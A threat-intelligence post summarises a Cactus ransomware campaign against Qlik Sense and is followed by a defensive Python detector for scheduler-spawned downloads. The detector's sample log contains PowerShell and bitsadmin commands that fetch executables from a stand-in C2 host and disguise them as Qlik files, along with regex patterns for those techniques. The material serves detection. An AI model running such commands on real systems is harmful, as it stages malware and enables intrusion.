#CyberAttackTools
osintelligence · 1 year ago
https://bit.ly/46JsW4x

🚨 Cactus Ransomware Targets Qlik Sense: Arctic Wolf Labs reports a new Cactus ransomware campaign exploiting vulnerabilities in Qlik Sense, a cloud analytics platform. This campaign marks the first known instance of Qlik Sense being targeted for ransomware deployment. #CactusRansomware #CyberSecurity #QlikSenseExploit

🔍 Intrusion Analysis and Exploitation Details: The intrusions involve exploiting known vulnerabilities (CVE-2023-41266, CVE-2023-41265, CVE-2023-48365) in Qlik Sense for initial access. The execution chain consistently involves the Qlik Sense Scheduler service, triggering uncommon processes and downloading malicious tools. #ThreatIntelligence #VulnerabilityExploitation

⚙️ Malicious Activity and Tools Used: Attackers use PowerShell and BITS for downloading tools like ManageEngine UEMS, AnyDesk, and PuTTY Link for persistence and remote control. These tools are disguised as legitimate Qlik files and downloaded using various PowerShell commands. #MalwareTactics #CyberAttackTools

🔑 Ransomware Deployment and Lateral Movement: Following successful exploitation, Cactus ransomware is deployed. Attackers use RDP for lateral movement and tools like WizTree and rclone for disk analysis and data exfiltration. All attacks show significant overlaps, pointing to a single threat actor. #RansomwareAttack #DataExfiltration

🛡️ Indicators of Compromise (IoCs) Identified: Several IoCs, including IP addresses, domain names, and file paths, are associated with this campaign. These IoCs are crucial for organizations to detect and respond to similar threats. #CyberDefense #IoCs

🧠 Insights from Arctic Wolf Researchers: Stefan Hostetler, Markus Neis, and Kyle Pagelow from Arctic Wolf Labs contribute their expertise in threat intelligence and forensic analysis to this investigation, providing vital insights into sophisticated cyber threats. #CybersecurityExperts #ArcticWolfLabs

The continuous monitoring and analysis of this campaign emphasize the importance of proactive cybersecurity measures and the need for constant vigilance in the face of evolving cyber threats.
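The execution chain the post describes (the Qlik Sense Scheduler service spawning uncommon child processes that pull tools down with PowerShell or BITS, with payloads masquerading as Qlik files) is something a defender can turn into a detection over process-creation telemetry. The following is an added example, not code from Arctic Wolf or from the post: it parses a few constructed key=value process-creation log lines and flags events whose parent is the scheduler and whose child is PowerShell or BITS running a download command. The scheduler executable name (`scheduler.exe`), the `\Qlik\` install-path marker, the log format and all URLs and file names are assumptions or constructed sample values, not IoCs from the report.

```python
"""Detect PowerShell/BITS downloads spawned by the Qlik Sense Scheduler.

Added example (not Arctic Wolf's or the post's code). Log format, the
scheduler binary name and the sample events are assumptions/constructed.
"""
import re
from dataclasses import dataclass
from typing import List, Tuple

# Assumption: the Qlik Sense Scheduler service runs as this executable name.
SCHEDULER_PARENT = "scheduler.exe"

# Children the post names as the download vehicles (uncommon for a scheduler).
SUSPICIOUS_CHILDREN = {"powershell.exe", "pwsh.exe", "bitsadmin.exe"}

# Generic download markers for PowerShell web cmdlets and BITS transfers.
DOWNLOAD_MARKERS = re.compile(
    r"invoke-webrequest|\biwr\b|downloadfile|start-bitstransfer|bitsadmin(\.exe)?\s+/transfer",
    re.IGNORECASE,
)

# Assumption: the Qlik install path contains a \Qlik\ component; a download
# written there matches the "disguised as legitimate Qlik files" behaviour.
QLIK_DIR_MARKER = re.compile(r"\\qlik\\", re.IGNORECASE)

FIELD_RE = re.compile(r'(\w+)="([^"]*)"')


@dataclass
class ProcessEvent:
    ts: str
    host: str
    parent: str
    image: str
    cmd: str


def parse_event(line: str) -> ProcessEvent:
    """Parse one constructed key="value" process-creation line."""
    f = dict(FIELD_RE.findall(line))
    return ProcessEvent(f["ts"], f["host"], f["parent"], f["image"], f["cmd"])


def basename(path: str) -> str:
    """Lower-cased file name from a Windows or POSIX path."""
    return path.replace("\\", "/").rsplit("/", 1)[-1].lower()


def score_event(ev: ProcessEvent) -> List[str]:
    """Return the reasons an event is suspicious (empty list = benign)."""
    reasons: List[str] = []
    if basename(ev.parent) != SCHEDULER_PARENT:
        return reasons  # only interested in the scheduler's children
    if basename(ev.image) in SUSPICIOUS_CHILDREN:
        reasons.append("scheduler spawned PowerShell/BITS child")
    if DOWNLOAD_MARKERS.search(ev.cmd):
        reasons.append("download command run under scheduler")
        if QLIK_DIR_MARKER.search(ev.cmd):
            reasons.append("payload written into Qlik directory (masquerading)")
    return reasons


def detect(lines: List[str]) -> List[Tuple[str, str, str, List[str]]]:
    """Run every line through score_event and keep the hits."""
    hits = []
    for line in lines:
        ev = parse_event(line)
        reasons = score_event(ev)
        if reasons:
            hits.append((ev.host, ev.ts, basename(ev.image), reasons))
    return hits


# Constructed sample telemetry; URLs use the reserved .invalid TLD.
SCHED = "C:\\Program Files\\Qlik\\Sense\\Scheduler\\Scheduler.exe"
SAMPLE_LOG = [
    # benign: scheduler starting a Qlik engine worker
    f'ts="2023-11-20T03:12:01Z" host="qlik01" parent="{SCHED}" image="C:\\Program Files\\Qlik\\Sense\\Engine\\Engine.exe" cmd="Engine.exe -reload"',
    # suspicious: PowerShell download under the scheduler, dropped into the Qlik dir
    f'ts="2023-11-20T03:12:44Z" host="qlik01" parent="{SCHED}" image="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe" cmd="powershell -nop -c Invoke-WebRequest -Uri http://EXAMPLE-C2.invalid/putty.exe -OutFile C:\\Program Files\\Qlik\\Sense\\QlikHelper.exe"',
    # suspicious: BITS transfer under the scheduler
    f'ts="2023-11-20T03:13:10Z" host="qlik01" parent="{SCHED}" image="C:\\Windows\\System32\\bitsadmin.exe" cmd="bitsadmin /transfer job /download http://EXAMPLE-C2.invalid/ad.exe C:\\Users\\Public\\ad.exe"',
    # benign: interactive admin PowerShell, not parented by the scheduler
    'ts="2023-11-20T08:00:00Z" host="qlik01" parent="C:\\Windows\\explorer.exe" image="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe" cmd="powershell Get-Service"',
]

if __name__ == "__main__":
    for host, ts, image, reasons in detect(SAMPLE_LOG):
        print(f"[{ts}] {host} {image}: {'; '.join(reasons)}")
```

The parent-process condition is what keeps the rule quiet: PowerShell and BITS are common on any Windows host, but a scheduler service launching them to fetch files is not, which is the pattern the post highlights. In practice the parent name and install path should be taken from the telemetry of the environment being monitored rather than from the assumptions above.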